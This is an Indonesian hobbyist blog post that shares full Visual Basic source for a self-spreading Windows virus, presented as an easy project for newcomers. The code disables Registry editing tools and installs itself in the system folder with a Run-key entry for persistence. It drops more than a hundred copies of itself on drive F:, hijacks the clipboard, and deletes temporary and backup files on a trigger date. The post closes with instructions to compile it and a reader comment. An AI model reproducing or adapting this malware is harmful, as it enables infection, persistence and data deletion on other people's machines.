virus

C:\ me _ arturhack the crash root

Bwt virus dengan VB

Heheh karang kan lagi marak-maraknya virus lokal guys … sekedar sharing aja bwt virus tu gampang !!!!!! berikut source codenya …

Untuk para newbie maklum yea lo gag ngerti… hehehe

Option Explicit

Private Sub Form_Load()

On Error Resume Next

If App.PrevInstance = True Then End

Call RegDisable

Call InfectSystem

If App.Path = “A:\” Or App.Path = “B:\” Then

Unload Me

End If

End Sub

Private Sub Text1_Change()

End Sub

Private Sub tmrIseng_Timer()

On Error Resume Next

Clipboard.Clear

Clipboard.SetText ” komputer anda telah terinfeksi virus hacked by arturhack “

End Sub

Private Sub tmrWSar2_Timer()

On Error Resume Next

Call InfectFloppy

If Day(Now) = 13 And Month(Now) = 10 Then

Call PayLoad

Unload Me

End If

End Sub

Function RegString(HiveAndKey As String, Value As String)

Dim newbie As Variant

Set newbie = CreateObject(“Wscript.Shell”)

newbie.regwrite HiveAndKey, Value

End Function

Function RegDword(HiveAndKey As String, Value As Integer)

Dim newbie As Variant

Set newbie = CreateObject(“Wscript.Shell”)

newbie.regwrite HiveAndKey, Value, “REG_DWORD”

End Function

Private Sub RegDisable()

On Error Resume Next

RegDword “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\” & _

“System\DisableRegistryTools”, 1

End Sub

Private Sub InfectSystem()

On Error Resume Next

Dim kiddie As Variant

Dim sysfolder As Object

Set kiddie = CreateObject(“scripting.filesystemobject”)

Set sysfolder = kiddie.GetSpecialFolder(1)

FileCopy WormFile, sysfolder & “\” & “arturhack.exe”

RegString “HKLM\Software\Microsoft\Windows\CurrentVersio” & _

“n\Run\windll”, sysfolder & “\” & “arturhack.exe”

End Sub

Private Sub InfectFloppy()

On Error Resume Next

If Len(Dir$(“F:\arturhack.exe”)) = 0 Then

FileCopy WormFile, “F:\arturhack.exe”

FileCopy WormFile, “F:\arturhack2.exe”

FileCopy WormFile, “F:\artur43.exe”

FileCopy WormFile, “F:\artur3.exe”

FileCopy WormFile, “F:\artur34.exe”

FileCopy WormFile, “F:\artur434.exe”

FileCopy WormFile, “F:\artur434a.exe”

FileCopy WormFile, “F:\artur4y34s.exe”

FileCopy WormFile, “F:\artur43y4s.exe”

FileCopy WormFile, “F:\artur434rs.exe”

FileCopy WormFile, “F:\artur434sfg.exe”

FileCopy WormFile, “F:\artur434gf.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\arturrrr34f.exe”

FileCopy WormFile, “F:\artur4rr3r4f.exe”

FileCopy WormFile, “F:\artur43rrrr4f.exe”

FileCopy WormFile, “F:\artur4rr34f.exe”

FileCopy WormFile, “F:\artur43uy4f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur4yu34f.exe”

FileCopy WormFile, “F:\artur4uyuy34f.exe”

FileCopy WormFile, “F:\arturyy434f.exe”

FileCopy WormFile, “F:\artur4y3yy4f.exe”

FileCopy WormFile, “F:\artur4yyy34f.exe”

FileCopy WormFile, “F:\artur43yy4f.exe”

FileCopy WormFile, “F:\artur434uyuytf.exe”

FileCopy WormFile, “F:\artur43yu4f.exe”

FileCopy WormFile, “F:\artur43yy4f.exe”

FileCopy WormFile, “F:\arturtu434f.exe”

FileCopy WormFile, “F:\artur43yuy4f.exe”

FileCopy WormFile, “F:\artur43664f.exe”

FileCopy WormFile, “F:\artur43yy64f.exe”

FileCopy WormFile, “F:\artur43y4f.exe”

FileCopy WormFile, “F:\artur46634f.exe”

FileCopy WormFile, “F:\artur4tt34f.exe”

FileCopy WormFile, “F:\artur43hgh4f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur4h34f.exe”

FileCopy WormFile, “F:\artur4ghg34f.exe”

FileCopy WormFile, “F:\artur43ggg4f.exe”

FileCopy WormFile, “F:\artur4ghtt34f.exe”

FileCopy WormFile, “F:\artur43ghg4f.exe”

FileCopy WormFile, “F:\artur43ghg4f.exe”

FileCopy WormFile, “F:\artur4ghg34f.exe”

FileCopy WormFile, “F:\artur4gh34f.exe”

FileCopy WormFile, “F:\artur4gh34f.exe”

FileCopy WormFile, “F:\artur43gh4f.exe”

FileCopy WormFile, “F:\arturghg34f.exe”

FileCopy WormFile, “F:\artur43ghg4f.exe”

FileCopy WormFile, “F:\artur43hg4f.exe”

FileCopy WormFile, “F:\artur434ff.exe”

FileCopy WormFile, “F:\artur43f4f.exe”

FileCopy WormFile, “F:\artur434ytggf.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur4yy34f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434ygf.exe”

FileCopy WormFile, “F:\artur43yyf4f.exe”

FileCopy WormFile, “F:\artur434ygf.exe”

FileCopy WormFile, “F:\artur434yhf.exe”

FileCopy WormFile, “F:\artur434jhgf.exe”

FileCopy WormFile, “F:\artur434yf.exe”

FileCopy WormFile, “F:\artur4hy34f.exe”

FileCopy WormFile, “F:\artur43yhy4f.exe”

FileCopy WormFile, “F:\artur43yhy4f.exe”

FileCopy WormFile, “F:\arturyh434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur43hy4f.exe”

FileCopy WormFile, “F:\artur4hy34f.exe”

FileCopy WormFile, “F:\artur43hy4f.exe”

FileCopy WormFile, “F:\artur4yh34f.exe”

FileCopy WormFile, “F:\artur43yj4f.exe”

FileCopy WormFile, “F:\artur43h4f.exe”

FileCopy WormFile, “F:\arturh434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur4gh34f.exe”

FileCopy WormFile, “F:\artur4gh34f.exe”

FileCopy WormFile, “F:\artur4hh34f.exe”

FileCopy WormFile, “F:\artur4hf34f.exe”

FileCopy WormFile, “F:\artur434fhf.exe”

FileCopy WormFile, “F:\artur434fhf.exe”

FileCopy WormFile, “F:\artur434hff.exe”

FileCopy WormFile, “F:\artur434fhf.exe”

FileCopy WormFile, “F:\artur434hhf.exe”

FileCopy WormFile, “F:\artur434fdd.exe”

FileCopy WormFile, “F:\artur434df.exe”

FileCopy WormFile, “F:\artur43dfg4f.exe”

FileCopy WormFile, “F:\artur43dgd4f.exe”

FileCopy WormFile, “F:\artur43dg4f.exe”

FileCopy WormFile, “F:\artur43dd4f.exe”

FileCopy WormFile, “F:\artur43dg4f.exe”

FileCopy WormFile, “F:\artur434ff.exe”

FileCopy WormFile, “F:\artur434ff.exe”

FileCopy WormFile, “F:\artur434ff.exe”

FileCopy WormFile, “F:\artur434ff.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434ff.exe”

FileCopy WormFile, “F:\artur43f4f.exe”

FileCopy WormFile, “F:\artur434hf.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur43s4f.exe”

FileCopy WormFile, “F:\artur43r4f.exe”

FileCopy WormFile, “F:\artur4hy34f.exe”

FileCopy WormFile, “F:\arture434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434ef.exe”

FileCopy WormFile, “F:\artur43y4f.exe”

FileCopy WormFile, “F:\artur4r34f.exe”

FileCopy WormFile, “F:\arturr434f.exe”

FileCopy WormFile, “F:\artur434rf.exe”

FileCopy WormFile, “F:\artur43r4f.exe”

FileCopy WormFile, “F:\artur4r34f.exe”

FileCopy WormFile, “F:\arturr434f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434fy.exe”

FileCopy WormFile, “F:\artur434tf.exe”

FileCopy WormFile, “F:\artur434ft.exe”

FileCopy WormFile, “F:\artur434ft.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur434tf.exe”

FileCopy WormFile, “F:\artur43yt44f.exe”

FileCopy WormFile, “F:\artur4434f.exe”

FileCopy WormFile, “F:\artur4344f.exe”

FileCopy WormFile, “F:\artur4344f.exe”

FileCopy WormFile, “F:\artur4344f.exe”

FileCopy WormFile, “F:\artur4434f.exe”

FileCopy WormFile, “F:\artur4434f.exe”

FileCopy WormFile, “F:\artur44344f.exe”

FileCopy WormFile, “F:\artur4344f.exe”

FileCopy WormFile, “F:\artur434f.exe”

FileCopy WormFile, “F:\artur4434f.exe”

FileCopy WormFile, “F:\artur4354f.exe”

FileCopy WormFile, “F:\artur4344f.exe”

FileCopy WormFile, “F:\artur4r34f.exe”

FileCopy WormFile, “F:\artur43r4f.exe”

FileCopy WormFile, “F:\artur4f34f.exe”

FileCopy WormFile, “F:\artur43f4f.exe”

End If

End Sub

Private Sub PayLoad()

On Error Resume Next

Dim kiddie As Variant

Dim winfolder, sysfolder, tmpfolder As Object

Set kiddie = CreateObject(“scripting.filesystemobject”)

Set winfolder = kiddie.GetSpecialFolder(0)

Set sysfolder = kiddie.GetSpecialFolder(1)

Set tmpfolder = kiddie.GetSpecialFolder(2)

Kill winfolder & “\” & “*.tmp”

Kill sysfolder & “\” & “*.bak”

Kill tmpfolder & “\” & “*.*”

MsgBox “Virus Ada Pada Komputer Anda”

End Sub

Private Function WormFile()

Dim WPath, WName As String

WPath = App.Path

If Right(WPath, 1) <> “\” Then

WPath = WPath & “\”

End If

WName = App.EXEName & “.exe”

WormFile = WPath & WName

End Function

Abis toe compile ajah…..

Terbukti ney virus terdeksi oleh avira… haha…..

Untuk para newbie maklum yea lo gag ngerti… hehehe

Komentar
  1. Ghadinkz mengatakan:

    gak jelas kk caranya……
    hehe… virus-nya msh ke detect tuh….. ^^

Tinggalkan Balasan

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Ubah )

Twitter picture

You are commenting using your Twitter account. Log Out / Ubah )

Facebook photo

You are commenting using your Facebook account. Log Out / Ubah )

Connecting to %s